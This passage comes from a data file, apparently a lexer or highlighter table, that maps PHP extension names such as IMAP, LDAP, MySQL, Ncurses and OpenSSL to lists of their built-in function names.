'hw_GetObjectByQueryColl', 'hw_GetObjectByQueryCollObj', 'hw_GetObjectByQueryObj', 'hw_GetParents', 'hw_GetParentsObj', 'hw_getrellink', 'hw_GetRemote', 'hw_getremotechildren', 'hw_GetSrcByDestObj', 'hw_GetText', 'hw_getusername', 'hw_Identify', 'hw_InCollections', 'hw_Info', 'hw_InsColl', 'hw_InsDoc', 'hw_insertanchors', 'hw_InsertDocument', 'hw_InsertObject', 'hw_mapid', 'hw_Modifyobject', 'hw_mv', 'hw_New_Document', 'hw_objrec2array', 'hw_Output_Document', 'hw_pConnect', 'hw_PipeDocument', 'hw_Root', 'hw_setlinkroot', 'hw_stat', 'hw_Unlock', 'hw_Who'], 'Hyperwave API': ['hwapi_attribute_new', 'hwapi_content_new', 'hwapi_hgcsp', 'hwapi_object_new'], 'IBM DB2': ['db2_autocommit', 'db2_bind_param', 'db2_client_info', 'db2_close', 'db2_column_privileges', 'db2_columns', 'db2_commit', 'db2_conn_error', 'db2_conn_errormsg', 'db2_connect', 'db2_cursor_type', 'db2_escape_string', 'db2_exec', 'db2_execute', 'db2_fetch_array', 'db2_fetch_assoc', 'db2_fetch_both', 'db2_fetch_object', 'db2_fetch_row', 'db2_field_display_size', 'db2_field_name', 'db2_field_num', 'db2_field_precision', 'db2_field_scale', 'db2_field_type', 'db2_field_width', 'db2_foreign_keys', 'db2_free_result', 'db2_free_stmt', 'db2_get_option', 'db2_last_insert_id', 'db2_lob_read', 'db2_next_result', 'db2_num_fields', 'db2_num_rows', 'db2_pclose', 'db2_pconnect', 'db2_prepare', 'db2_primary_keys', 'db2_procedure_columns', 'db2_procedures', 'db2_result', 'db2_rollback', 'db2_server_info', 'db2_set_option', 'db2_special_columns', 'db2_statistics', 'db2_stmt_error', 'db2_stmt_errormsg', 'db2_table_privileges', 'db2_tables'], 'ID3': ['id3_get_frame_long_name', 'id3_get_frame_short_name', 'id3_get_genre_id', 'id3_get_genre_list', 'id3_get_genre_name', 'id3_get_tag', 'id3_get_version', 'id3_remove_tag', 'id3_set_tag'], 'IDN': ['grapheme_substr', 'idn_to_ascii', 'idn_to_unicode', 'idn_to_utf8'], 'IIS': ['iis_add_server', 'iis_get_dir_security', 'iis_get_script_map', 'iis_get_server_by_comment', 'iis_get_server_by_path', 'iis_get_server_rights', 'iis_get_service_state', 'iis_remove_server', 'iis_set_app_settings', 'iis_set_dir_security', 'iis_set_script_map', 'iis_set_server_rights', 'iis_start_server', 'iis_start_service', 'iis_stop_server', 'iis_stop_service'], 'IMAP': ['imap_8bit', 'imap_alerts', 'imap_append', 'imap_base64', 'imap_binary', 'imap_body', 'imap_bodystruct', 'imap_check', 'imap_clearflag_full', 'imap_close', 'imap_create', 'imap_createmailbox', 'imap_delete', 'imap_deletemailbox', 'imap_errors', 'imap_expunge', 'imap_fetch_overview', 'imap_fetchbody', 'imap_fetchheader', 'imap_fetchmime', 'imap_fetchstructure', 'imap_fetchtext', 'imap_gc', 'imap_get_quota', 'imap_get_quotaroot', 'imap_getacl', 'imap_getmailboxes', 'imap_getsubscribed', 'imap_header', 'imap_headerinfo', 'imap_headers', 'imap_last_error', 'imap_list', 'imap_listmailbox', 'imap_listscan', 'imap_listsubscribed', 'imap_lsub', 'imap_mail_compose', 'imap_mail_copy', 'imap_mail_move', 'imap_mail', 'imap_mailboxmsginfo', 'imap_mime_header_decode', 'imap_msgno', 'imap_num_msg', 'imap_num_recent', 'imap_open', 'imap_ping', 'imap_qprint', 'imap_rename', 'imap_renamemailbox', 'imap_reopen', 'imap_rfc822_parse_adrlist', 'imap_rfc822_parse_headers', 'imap_rfc822_write_address', 'imap_savebody', 'imap_scan', 'imap_scanmailbox', 'imap_search', 'imap_set_quota', 'imap_setacl', 'imap_setflag_full', 'imap_sort', 'imap_status', 'imap_subscribe', 'imap_thread', 'imap_timeout', 'imap_uid', 'imap_undelete', 'imap_unsubscribe', 'imap_utf7_decode', 'imap_utf7_encode', 'imap_utf8'], 'Informix': ['ifx_affected_rows', 'ifx_blobinfile_mode', 'ifx_byteasvarchar', 'ifx_close', 'ifx_connect', 'ifx_copy_blob', 'ifx_create_blob', 'ifx_create_char', 'ifx_do', 'ifx_error', 'ifx_errormsg', 'ifx_fetch_row', 'ifx_fieldproperties', 'ifx_fieldtypes', 'ifx_free_blob', 'ifx_free_char', 'ifx_free_result', 'ifx_get_blob', 'ifx_get_char', 'ifx_getsqlca', 'ifx_htmltbl_result', 'ifx_nullformat', 'ifx_num_fields', 'ifx_num_rows', 'ifx_pconnect', 'ifx_prepare', 'ifx_query', 'ifx_textasvarchar', 'ifx_update_blob', 'ifx_update_char', 'ifxus_close_slob', 'ifxus_create_slob', 'ifxus_free_slob', 'ifxus_open_slob', 'ifxus_read_slob', 'ifxus_seek_slob', 'ifxus_tell_slob', 'ifxus_write_slob'], 'Ingres': ['ingres_autocommit_state', 'ingres_autocommit', 'ingres_charset', 'ingres_close', 'ingres_commit', 'ingres_connect', 'ingres_cursor', 'ingres_errno', 'ingres_error', 'ingres_errsqlstate', 'ingres_escape_string', 'ingres_execute', 'ingres_fetch_array', 'ingres_fetch_assoc', 'ingres_fetch_object', 'ingres_fetch_proc_return', 'ingres_fetch_row', 'ingres_field_length', 'ingres_field_name', 'ingres_field_nullable', 'ingres_field_precision', 'ingres_field_scale', 'ingres_field_type', 'ingres_free_result', 'ingres_next_error', 'ingres_num_fields', 'ingres_num_rows', 'ingres_pconnect', 'ingres_prepare', 'ingres_query', 'ingres_result_seek', 'ingres_rollback', 'ingres_set_environment', 'ingres_unbuffered_query'], 'Inotify': ['inotify_add_watch', 'inotify_init', 'inotify_queue_len', 'inotify_read', 'inotify_rm_watch'], 'JSON': ['json_decode', 'json_encode', 'json_last_error_msg', 'json_last_error'], 'Java': ['java_last_exception_clear', 'java_last_exception_get'], 'Judy': ['judy_type', 'judy_version'], 'KADM5': ['kadm5_chpass_principal', 'kadm5_create_principal', 'kadm5_delete_principal', 'kadm5_destroy', 'kadm5_flush', 'kadm5_get_policies', 'kadm5_get_principal', 'kadm5_get_principals', 'kadm5_init_with_password', 'kadm5_modify_principal'], 'LDAP': ['ldap_8859_to_t61', 'ldap_add', 'ldap_bind', 'ldap_close', 'ldap_compare', 'ldap_connect', 'ldap_control_paged_result_response', 'ldap_control_paged_result', 'ldap_count_entries', 'ldap_delete', 'ldap_dn2ufn', 'ldap_err2str', 'ldap_errno', 'ldap_error', 'ldap_explode_dn', 'ldap_first_attribute', 'ldap_first_entry', 'ldap_first_reference', 'ldap_free_result', 'ldap_get_attributes', 'ldap_get_dn', 'ldap_get_entries', 'ldap_get_option', 'ldap_get_values_len', 'ldap_get_values', 'ldap_list', 'ldap_mod_add', 'ldap_mod_del', 'ldap_mod_replace', 'ldap_modify', 'ldap_next_attribute', 'ldap_next_entry', 'ldap_next_reference', 'ldap_parse_reference', 'ldap_parse_result', 'ldap_read', 'ldap_rename', 'ldap_sasl_bind', 'ldap_search', 'ldap_set_option', 'ldap_set_rebind_proc', 'ldap_sort', 'ldap_start_tls', 'ldap_t61_to_8859', 'ldap_unbind'], 'LZF': ['lzf_compress', 'lzf_decompress', 'lzf_optimized_for'], 'Libevent': ['event_add', 'event_base_free', 'event_base_loop', 'event_base_loopbreak', 'event_base_loopexit', 'event_base_new', 'event_base_priority_init', 'event_base_set', 'event_buffer_base_set', 'event_buffer_disable', 'event_buffer_enable', 'event_buffer_fd_set', 'event_buffer_free', 'event_buffer_new', 'event_buffer_priority_set', 'event_buffer_read', 'event_buffer_set_callback', 'event_buffer_timeout_set', 'event_buffer_watermark_set', 'event_buffer_write', 'event_del', 'event_free', 'event_new', 'event_set'], 'Lotus Notes': ['notes_body', 'notes_copy_db', 'notes_create_db', 'notes_create_note', 'notes_drop_db', 'notes_find_note', 'notes_header_info', 'notes_list_msgs', 'notes_mark_read', 'notes_mark_unread', 'notes_nav_create', 'notes_search', 'notes_unread', 'notes_version'], 'MCVE': ['m_checkstatus', 'm_completeauthorizations', 'm_connect', 'm_connectionerror', 'm_deletetrans', 'm_destroyconn', 'm_destroyengine', 'm_getcell', 'm_getcellbynum', 'm_getcommadelimited', 'm_getheader', 'm_initconn', 'm_initengine', 'm_iscommadelimited', 'm_maxconntimeout', 'm_monitor', 'm_numcolumns', 'm_numrows', 'm_parsecommadelimited', 'm_responsekeys', 'm_responseparam', 'm_returnstatus', 'm_setblocking', 'm_setdropfile', 'm_setip', 'm_setssl_cafile', 'm_setssl_files', 'm_setssl', 'm_settimeout', 'm_sslcert_gen_hash', 'm_transactionssent', 'm_transinqueue', 'm_transkeyval', 'm_transnew', 'm_transsend', 'm_uwait', 'm_validateidentifier', 'm_verifyconnection', 'm_verifysslcert'], 'Mail': ['ezmlm_hash', 'mail'], 'Mailparse': ['mailparse_determine_best_xfer_encoding', 'mailparse_msg_create', 'mailparse_msg_extract_part_file', 'mailparse_msg_extract_part', 'mailparse_msg_extract_whole_part_file', 'mailparse_msg_free', 'mailparse_msg_get_part_data', 'mailparse_msg_get_part', 'mailparse_msg_get_structure', 'mailparse_msg_parse_file', 'mailparse_msg_parse', 'mailparse_rfc822_parse_addresses', 'mailparse_stream_encode', 'mailparse_uudecode_all'], 'Math': ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'], 'MaxDB': ['maxdb_affected_rows', 'maxdb_autocommit', 'maxdb_bind_param', 'maxdb_bind_result', 'maxdb_change_user', 'maxdb_character_set_name', 'maxdb_client_encoding', 'maxdb_close_long_data', 'maxdb_close', 'maxdb_commit', 'maxdb_connect_errno', 'maxdb_connect_error', 'maxdb_connect', 'maxdb_data_seek', 'maxdb_debug', 'maxdb_disable_reads_from_master', 'maxdb_disable_rpl_parse', 'maxdb_dump_debug_info', 'maxdb_embedded_connect', 'maxdb_enable_reads_from_master', 'maxdb_enable_rpl_parse', 'maxdb_errno', 'maxdb_error', 'maxdb_escape_string', 'maxdb_execute', 'maxdb_fetch_array', 'maxdb_fetch_assoc', 'maxdb_fetch_field_direct', 'maxdb_fetch_field', 'maxdb_fetch_fields', 'maxdb_fetch_lengths', 'maxdb_fetch_object', 'maxdb_fetch_row', 'maxdb_fetch', 'maxdb_field_count', 'maxdb_field_seek', 'maxdb_field_tell', 'maxdb_free_result', 'maxdb_get_client_info', 'maxdb_get_client_version', 'maxdb_get_host_info', 'maxdb_get_metadata', 'maxdb_get_proto_info', 'maxdb_get_server_info', 'maxdb_get_server_version', 'maxdb_info', 'maxdb_init', 'maxdb_insert_id', 'maxdb_kill', 'maxdb_master_query', 'maxdb_more_results', 'maxdb_multi_query', 'maxdb_next_result', 'maxdb_num_fields', 'maxdb_num_rows', 'maxdb_options', 'maxdb_param_count', 'maxdb_ping', 'maxdb_prepare', 'maxdb_query', 'maxdb_real_connect', 'maxdb_real_escape_string', 'maxdb_real_query', 'maxdb_report', 'maxdb_rollback', 'maxdb_rpl_parse_enabled', 'maxdb_rpl_probe', 'maxdb_rpl_query_type', 'maxdb_select_db', 'maxdb_send_long_data', 'maxdb_send_query', 'maxdb_server_end', 'maxdb_server_init', 'maxdb_set_opt', 'maxdb_sqlstate', 'maxdb_ssl_set', 'maxdb_stat', 'maxdb_stmt_affected_rows', 'maxdb_stmt_bind_param', 'maxdb_stmt_bind_result', 'maxdb_stmt_close_long_data', 'maxdb_stmt_close', 'maxdb_stmt_data_seek', 'maxdb_stmt_errno', 'maxdb_stmt_error', 'maxdb_stmt_execute', 'maxdb_stmt_fetch', 'maxdb_stmt_free_result', 'maxdb_stmt_init', 'maxdb_stmt_num_rows', 'maxdb_stmt_param_count', 'maxdb_stmt_prepare', 'maxdb_stmt_reset', 'maxdb_stmt_result_metadata', 'maxdb_stmt_send_long_data', 'maxdb_stmt_sqlstate', 'maxdb_stmt_store_result', 'maxdb_store_result', 'maxdb_thread_id', 'maxdb_thread_safe', 'maxdb_use_result', 'maxdb_warning_count'], 'Mcrypt': ['mcrypt_cbc', 'mcrypt_cfb', 'mcrypt_create_iv', 'mcrypt_decrypt', 'mcrypt_ecb', 'mcrypt_enc_get_algorithms_name', 'mcrypt_enc_get_block_size', 'mcrypt_enc_get_iv_size', 'mcrypt_enc_get_key_size', 'mcrypt_enc_get_modes_name', 'mcrypt_enc_get_supported_key_sizes', 'mcrypt_enc_is_block_algorithm_mode', 'mcrypt_enc_is_block_algorithm', 'mcrypt_enc_is_block_mode', 'mcrypt_enc_self_test', 'mcrypt_encrypt', 'mcrypt_generic_deinit', 'mcrypt_generic_end', 'mcrypt_generic_init', 'mcrypt_generic', 'mcrypt_get_block_size', 'mcrypt_get_cipher_name', 'mcrypt_get_iv_size', 'mcrypt_get_key_size', 'mcrypt_list_algorithms', 'mcrypt_list_modes', 'mcrypt_module_close', 'mcrypt_module_get_algo_block_size', 'mcrypt_module_get_algo_key_size', 'mcrypt_module_get_supported_key_sizes', 'mcrypt_module_is_block_algorithm_mode', 'mcrypt_module_is_block_algorithm', 'mcrypt_module_is_block_mode', 'mcrypt_module_open', 'mcrypt_module_self_test', 'mcrypt_ofb', 'mdecrypt_generic'], 'Memcache': ['memcache_debug'], 'Mhash': ['mhash_count', 'mhash_get_block_size', 'mhash_get_hash_name', 'mhash_keygen_s2k', 'mhash'], 'Ming': ['ming_keypress', 'ming_setcubicthreshold', 'ming_setscale', 'ming_setswfcompression', 'ming_useconstants', 'ming_useswfversion'], 'Misc.': ['connection_aborted', 'connection_status', 'connection_timeout', 'constant', 'define', 'defined', 'die', 'eval', 'exit', 'get_browser', '__halt_compiler', 'highlight_file', 'highlight_string', 'ignore_user_abort', 'pack', 'php_check_syntax', 'php_strip_whitespace', 'show_source', 'sleep', 'sys_getloadavg', 'time_nanosleep', 'time_sleep_until', 'uniqid', 'unpack', 'usleep'], 'Mongo': ['bson_decode', 'bson_encode'], 'Msession': ['msession_connect', 'msession_count', 'msession_create', 'msession_destroy', 'msession_disconnect', 'msession_find', 'msession_get_array', 'msession_get_data', 'msession_get', 'msession_inc', 'msession_list', 'msession_listvar', 'msession_lock', 'msession_plugin', 'msession_randstr', 'msession_set_array', 'msession_set_data', 'msession_set', 'msession_timeout', 'msession_uniq', 'msession_unlock'], 'Mssql': ['mssql_bind', 'mssql_close', 'mssql_connect', 'mssql_data_seek', 'mssql_execute', 'mssql_fetch_array', 'mssql_fetch_assoc', 'mssql_fetch_batch', 'mssql_fetch_field', 'mssql_fetch_object', 'mssql_fetch_row', 'mssql_field_length', 'mssql_field_name', 'mssql_field_seek', 'mssql_field_type', 'mssql_free_result', 'mssql_free_statement', 'mssql_get_last_message', 'mssql_guid_string', 'mssql_init', 'mssql_min_error_severity', 'mssql_min_message_severity', 'mssql_next_result', 'mssql_num_fields', 'mssql_num_rows', 'mssql_pconnect', 'mssql_query', 'mssql_result', 'mssql_rows_affected', 'mssql_select_db'], 'Multibyte String': ['mb_check_encoding', 'mb_convert_case', 'mb_convert_encoding', 'mb_convert_kana', 'mb_convert_variables', 'mb_decode_mimeheader', 'mb_decode_numericentity', 'mb_detect_encoding', 'mb_detect_order', 'mb_encode_mimeheader', 'mb_encode_numericentity', 'mb_encoding_aliases', 'mb_ereg_match', 'mb_ereg_replace_callback', 'mb_ereg_replace', 'mb_ereg_search_getpos', 'mb_ereg_search_getregs', 'mb_ereg_search_init', 'mb_ereg_search_pos', 'mb_ereg_search_regs', 'mb_ereg_search_setpos', 'mb_ereg_search', 'mb_ereg', 'mb_eregi_replace', 'mb_eregi', 'mb_get_info', 'mb_http_input', 'mb_http_output', 'mb_internal_encoding', 'mb_language', 'mb_list_encodings', 'mb_output_handler', 'mb_parse_str', 'mb_preferred_mime_name', 'mb_regex_encoding', 'mb_regex_set_options', 'mb_send_mail', 'mb_split', 'mb_strcut', 'mb_strimwidth', 'mb_stripos', 'mb_stristr', 'mb_strlen', 'mb_strpos', 'mb_strrchr', 'mb_strrichr', 'mb_strripos', 'mb_strrpos', 'mb_strstr', 'mb_strtolower', 'mb_strtoupper', 'mb_strwidth', 'mb_substitute_character', 'mb_substr_count', 'mb_substr'], 'MySQL': ['mysql_affected_rows', 'mysql_client_encoding', 'mysql_close', 'mysql_connect', 'mysql_create_db', 'mysql_data_seek', 'mysql_db_name', 'mysql_db_query', 'mysql_drop_db', 'mysql_errno', 'mysql_error', 'mysql_escape_string', 'mysql_fetch_array', 'mysql_fetch_assoc', 'mysql_fetch_field', 'mysql_fetch_lengths', 'mysql_fetch_object', 'mysql_fetch_row', 'mysql_field_flags', 'mysql_field_len', 'mysql_field_name', 'mysql_field_seek', 'mysql_field_table', 'mysql_field_type', 'mysql_free_result', 'mysql_get_client_info', 'mysql_get_host_info', 'mysql_get_proto_info', 'mysql_get_server_info', 'mysql_info', 'mysql_insert_id', 'mysql_list_dbs', 'mysql_list_fields', 'mysql_list_processes', 'mysql_list_tables', 'mysql_num_fields', 'mysql_num_rows', 'mysql_pconnect', 'mysql_ping', 'mysql_query', 'mysql_real_escape_string', 'mysql_result', 'mysql_select_db', 'mysql_set_charset', 'mysql_stat', 'mysql_tablename', 'mysql_thread_id', 'mysql_unbuffered_query'], 'Mysqlnd_memcache': ['mysqlnd_memcache_get_config', 'mysqlnd_memcache_set'], 'Mysqlnd_ms': ['mysqlnd_ms_dump_servers', 'mysqlnd_ms_fabric_select_global', 'mysqlnd_ms_fabric_select_shard', 'mysqlnd_ms_get_last_gtid', 'mysqlnd_ms_get_last_used_connection', 'mysqlnd_ms_get_stats', 'mysqlnd_ms_match_wild', 'mysqlnd_ms_query_is_select', 'mysqlnd_ms_set_qos', 'mysqlnd_ms_set_user_pick_server'], 'Mysqlnd_uh': ['mysqlnd_uh_convert_to_mysqlnd', 'mysqlnd_uh_set_connection_proxy', 'mysqlnd_uh_set_statement_proxy'], 'NSAPI': ['nsapi_request_headers', 'nsapi_response_headers', 'nsapi_virtual'], 'Ncurses': ['ncurses_addch', 'ncurses_addchnstr', 'ncurses_addchstr', 'ncurses_addnstr', 'ncurses_addstr', 'ncurses_assume_default_colors', 'ncurses_attroff', 'ncurses_attron', 'ncurses_attrset', 'ncurses_baudrate', 'ncurses_beep', 'ncurses_bkgd', 'ncurses_bkgdset', 'ncurses_border', 'ncurses_bottom_panel', 'ncurses_can_change_color', 'ncurses_cbreak', 'ncurses_clear', 'ncurses_clrtobot', 'ncurses_clrtoeol', 'ncurses_color_content', 'ncurses_color_set', 'ncurses_curs_set', 'ncurses_def_prog_mode', 'ncurses_def_shell_mode', 'ncurses_define_key', 'ncurses_del_panel', 'ncurses_delay_output', 'ncurses_delch', 'ncurses_deleteln', 'ncurses_delwin', 'ncurses_doupdate', 'ncurses_echo', 'ncurses_echochar', 'ncurses_end', 'ncurses_erase', 'ncurses_erasechar', 'ncurses_filter', 'ncurses_flash', 'ncurses_flushinp', 'ncurses_getch', 'ncurses_getmaxyx', 'ncurses_getmouse', 'ncurses_getyx', 'ncurses_halfdelay', 'ncurses_has_colors', 'ncurses_has_ic', 'ncurses_has_il', 'ncurses_has_key', 'ncurses_hide_panel', 'ncurses_hline', 'ncurses_inch', 'ncurses_init_color', 'ncurses_init_pair', 'ncurses_init', 'ncurses_insch', 'ncurses_insdelln', 'ncurses_insertln', 'ncurses_insstr', 'ncurses_instr', 'ncurses_isendwin', 'ncurses_keyok', 'ncurses_keypad', 'ncurses_killchar', 'ncurses_longname', 'ncurses_meta', 'ncurses_mouse_trafo', 'ncurses_mouseinterval', 'ncurses_mousemask', 'ncurses_move_panel', 'ncurses_move', 'ncurses_mvaddch', 'ncurses_mvaddchnstr', 'ncurses_mvaddchstr', 'ncurses_mvaddnstr', 'ncurses_mvaddstr', 'ncurses_mvcur', 'ncurses_mvdelch', 'ncurses_mvgetch', 'ncurses_mvhline', 'ncurses_mvinch', 'ncurses_mvvline', 'ncurses_mvwaddstr', 'ncurses_napms', 'ncurses_new_panel', 'ncurses_newpad', 'ncurses_newwin', 'ncurses_nl', 'ncurses_nocbreak', 'ncurses_noecho', 'ncurses_nonl', 'ncurses_noqiflush', 'ncurses_noraw', 'ncurses_pair_content', 'ncurses_panel_above', 'ncurses_panel_below', 'ncurses_panel_window', 'ncurses_pnoutrefresh', 'ncurses_prefresh', 'ncurses_putp', 'ncurses_qiflush', 'ncurses_raw', 'ncurses_refresh', 'ncurses_replace_panel', 'ncurses_reset_prog_mode', 'ncurses_reset_shell_mode', 'ncurses_resetty', 'ncurses_savetty', 'ncurses_scr_dump', 'ncurses_scr_init', 'ncurses_scr_restore', 'ncurses_scr_set', 'ncurses_scrl', 'ncurses_show_panel', 'ncurses_slk_attr', 'ncurses_slk_attroff', 'ncurses_slk_attron', 'ncurses_slk_attrset', 'ncurses_slk_clear', 'ncurses_slk_color', 'ncurses_slk_init', 'ncurses_slk_noutrefresh', 'ncurses_slk_refresh', 'ncurses_slk_restore', 'ncurses_slk_set', 'ncurses_slk_touch', 'ncurses_standend', 'ncurses_standout', 'ncurses_start_color', 'ncurses_termattrs', 'ncurses_termname', 'ncurses_timeout', 'ncurses_top_panel', 'ncurses_typeahead', 'ncurses_ungetch', 'ncurses_ungetmouse', 'ncurses_update_panels', 'ncurses_use_default_colors', 'ncurses_use_env', 'ncurses_use_extended_names', 'ncurses_vidattr', 'ncurses_vline', 'ncurses_waddch', 'ncurses_waddstr', 'ncurses_wattroff', 'ncurses_wattron', 'ncurses_wattrset', 'ncurses_wborder', 'ncurses_wclear', 'ncurses_wcolor_set', 'ncurses_werase', 'ncurses_wgetch', 'ncurses_whline', 'ncurses_wmouse_trafo', 'ncurses_wmove', 'ncurses_wnoutrefresh', 'ncurses_wrefresh', 'ncurses_wstandend', 'ncurses_wstandout', 'ncurses_wvline'], 'Network': ['checkdnsrr', 'closelog', 'define_syslog_variables', 'dns_check_record', 'dns_get_mx', 'dns_get_record', 'fsockopen', 'gethostbyaddr', 'gethostbyname', 'gethostbynamel', 'gethostname', 'getmxrr', 'getprotobyname', 'getprotobynumber', 'getservbyname', 'getservbyport', 'header_register_callback', 'header_remove', 'header', 'headers_list', 'headers_sent', 'http_response_code', 'inet_ntop', 'inet_pton', 'ip2long', 'long2ip', 'openlog', 'pfsockopen', 'setcookie', 'setrawcookie', 'socket_get_status', 'socket_set_blocking', 'socket_set_timeout', 'syslog'], 'Newt': ['newt_bell', 'newt_button_bar', 'newt_button', 'newt_centered_window', 'newt_checkbox_get_value', 'newt_checkbox_set_flags', 'newt_checkbox_set_value', 'newt_checkbox_tree_add_item', 'newt_checkbox_tree_find_item', 'newt_checkbox_tree_get_current', 'newt_checkbox_tree_get_entry_value', 'newt_checkbox_tree_get_multi_selection', 'newt_checkbox_tree_get_selection', 'newt_checkbox_tree_multi', 'newt_checkbox_tree_set_current', 'newt_checkbox_tree_set_entry_value', 'newt_checkbox_tree_set_entry', 'newt_checkbox_tree_set_width', 'newt_checkbox_tree', 'newt_checkbox', 'newt_clear_key_buffer', 'newt_cls', 'newt_compact_button', 'newt_component_add_callback', 'newt_component_takes_focus', 'newt_create_grid', 'newt_cursor_off', 'newt_cursor_on', 'newt_delay', 'newt_draw_form', 'newt_draw_root_text', 'newt_entry_get_value', 'newt_entry_set_filter', 'newt_entry_set_flags', 'newt_entry_set', 'newt_entry', 'newt_finished', 'newt_form_add_component', 'newt_form_add_components', 'newt_form_add_hot_key', 'newt_form_destroy', 'newt_form_get_current', 'newt_form_run', 'newt_form_set_background', 'newt_form_set_height', 'newt_form_set_size', 'newt_form_set_timer', 'newt_form_set_width', 'newt_form_watch_fd', 'newt_form', 'newt_get_screen_size', 'newt_grid_add_components_to_form', 'newt_grid_basic_window', 'newt_grid_free', 'newt_grid_get_size', 'newt_grid_h_close_stacked', 'newt_grid_h_stacked', 'newt_grid_place', 'newt_grid_set_field', 'newt_grid_simple_window', 'newt_grid_v_close_stacked', 'newt_grid_v_stacked', 'newt_grid_wrapped_window_at', 'newt_grid_wrapped_window', 'newt_init', 'newt_label_set_text', 'newt_label', 'newt_listbox_append_entry', 'newt_listbox_clear_selection', 'newt_listbox_clear', 'newt_listbox_delete_entry', 'newt_listbox_get_current', 'newt_listbox_get_selection', 'newt_listbox_insert_entry', 'newt_listbox_item_count', 'newt_listbox_select_item', 'newt_listbox_set_current_by_key', 'newt_listbox_set_current', 'newt_listbox_set_data', 'newt_listbox_set_entry', 'newt_listbox_set_width', 'newt_listbox', 'newt_listitem_get_data', 'newt_listitem_set', 'newt_listitem', 'newt_open_window', 'newt_pop_help_line', 'newt_pop_window', 'newt_push_help_line', 'newt_radio_get_current', 'newt_radiobutton', 'newt_redraw_help_line', 'newt_reflow_text', 'newt_refresh', 'newt_resize_screen', 'newt_resume', 'newt_run_form', 'newt_scale_set', 'newt_scale', 'newt_scrollbar_set', 'newt_set_help_callback', 'newt_set_suspend_callback', 'newt_suspend', 'newt_textbox_get_num_lines', 'newt_textbox_reflowed', 'newt_textbox_set_height', 'newt_textbox_set_text', 'newt_textbox', 'newt_vertical_scrollbar', 'newt_wait_for_key', 'newt_win_choice', 'newt_win_entries', 'newt_win_menu', 'newt_win_message', 'newt_win_messagev', 'newt_win_ternary'], 'OAuth': ['oauth_get_sbs', 'oauth_urlencode'], 'OCI8': ['oci_bind_array_by_name', 'oci_bind_by_name', 'oci_cancel', 'oci_client_version', 'oci_close', 'oci_commit', 'oci_connect', 'oci_define_by_name', 'oci_error', 'oci_execute', 'oci_fetch_all', 'oci_fetch_array', 'oci_fetch_assoc', 'oci_fetch_object', 'oci_fetch_row', 'oci_fetch', 'oci_field_is_null', 'oci_field_name', 'oci_field_precision', 'oci_field_scale', 'oci_field_size', 'oci_field_type_raw', 'oci_field_type', 'oci_free_descriptor', 'oci_free_statement', 'oci_get_implicit_resultset', 'oci_internal_debug', 'oci_lob_copy', 'oci_lob_is_equal', 'oci_new_collection', 'oci_new_connect', 'oci_new_cursor', 'oci_new_descriptor', 'oci_num_fields', 'oci_num_rows', 'oci_parse', 'oci_password_change', 'oci_pconnect', 'oci_result', 'oci_rollback', 'oci_server_version', 'oci_set_action', 'oci_set_client_identifier', 'oci_set_client_info', 'oci_set_edition', 'oci_set_module_name', 'oci_set_prefetch', 'oci_statement_type'], 'ODBC': ['odbc_autocommit', 'odbc_binmode', 'odbc_close_all', 'odbc_close', 'odbc_columnprivileges', 'odbc_columns', 'odbc_commit', 'odbc_connect', 'odbc_cursor', 'odbc_data_source', 'odbc_do', 'odbc_error', 'odbc_errormsg', 'odbc_exec', 'odbc_execute', 'odbc_fetch_array', 'odbc_fetch_into', 'odbc_fetch_object', 'odbc_fetch_row', 'odbc_field_len', 'odbc_field_name', 'odbc_field_num', 'odbc_field_precision', 'odbc_field_scale', 'odbc_field_type', 'odbc_foreignkeys', 'odbc_free_result', 'odbc_gettypeinfo', 'odbc_longreadlen', 'odbc_next_result', 'odbc_num_fields', 'odbc_num_rows', 'odbc_pconnect', 'odbc_prepare', 'odbc_primarykeys', 'odbc_procedurecolumns', 'odbc_procedures', 'odbc_result_all', 'odbc_result', 'odbc_rollback', 'odbc_setoption', 'odbc_specialcolumns', 'odbc_statistics', 'odbc_tableprivileges', 'odbc_tables'], 'OPcache': ['opcache_compile_file', 'opcache_get_configuration', 'opcache_get_status', 'opcache_invalidate', 'opcache_reset'], 'Object Aggregation': ['aggregate_info', 'aggregate_methods_by_list', 'aggregate_methods_by_regexp', 'aggregate_methods', 'aggregate_properties_by_list', 'aggregate_properties_by_regexp', 'aggregate_properties', 'aggregate', 'aggregation_info', 'deaggregate'], 'OpenAL': ['openal_buffer_create', 'openal_buffer_data', 'openal_buffer_destroy', 'openal_buffer_get', 'openal_buffer_loadwav', 'openal_context_create', 'openal_context_current', 'openal_context_destroy', 'openal_context_process', 'openal_context_suspend', 'openal_device_close', 'openal_device_open', 'openal_listener_get', 'openal_listener_set', 'openal_source_create', 'openal_source_destroy', 'openal_source_get', 'openal_source_pause', 'openal_source_play', 'openal_source_rewind', 'openal_source_set', 'openal_source_stop', 'openal_stream'], 'OpenSSL': ['openssl_cipher_iv_length', 'openssl_csr_export_to_file', 'openssl_csr_export', 'openssl_csr_get_public_key', 'openssl_csr_get_subject', 'openssl_csr_new', 'openssl_csr_sign', 'openssl_decrypt', 'openssl_dh_compute_key', 'openssl_digest', 'openssl_encrypt', 'openssl_error_string', 'openssl_free_key', 'openssl_get_cipher_methods', 'openssl_get_md_methods', 'openssl_get_privatekey', 'openssl_get_publickey', 'openssl_open', 'openssl_pbkdf2', 'openssl_pkcs12_export_to_file', 'openssl_pkcs12_export', 'openssl_pkcs12_read', 'openssl_pkcs7_decrypt', 'openssl_pkcs7_encrypt', 'openssl_pkcs7_sign', 'openssl_pkcs7_verify', 'openssl_pkey_export_to_file', 'openssl_pkey_export', 'openssl_pkey_free', 'openssl_pkey_get_details', 'openssl_pkey_get_private', 'openssl_pkey_get_public', 'openssl_pkey_new', 'openssl_private_decrypt', 'openssl_private_encrypt', 'openssl_public_decrypt', 'openssl_public_encrypt', 'openssl_random_pseudo_bytes', 'openssl_seal', 'openssl_sign', 'openssl_spki_export_challenge', 'openssl_spki_export', 'openssl_spki_new', 'openssl_spki_verify', 'openssl_verify', 'openssl_x509_check_private_key', 'openssl_x509_checkpurpose', 'openssl_x509_export_to_file', 'openssl_x509_export', 'openssl_x509_free', 'openssl_x509_parse', 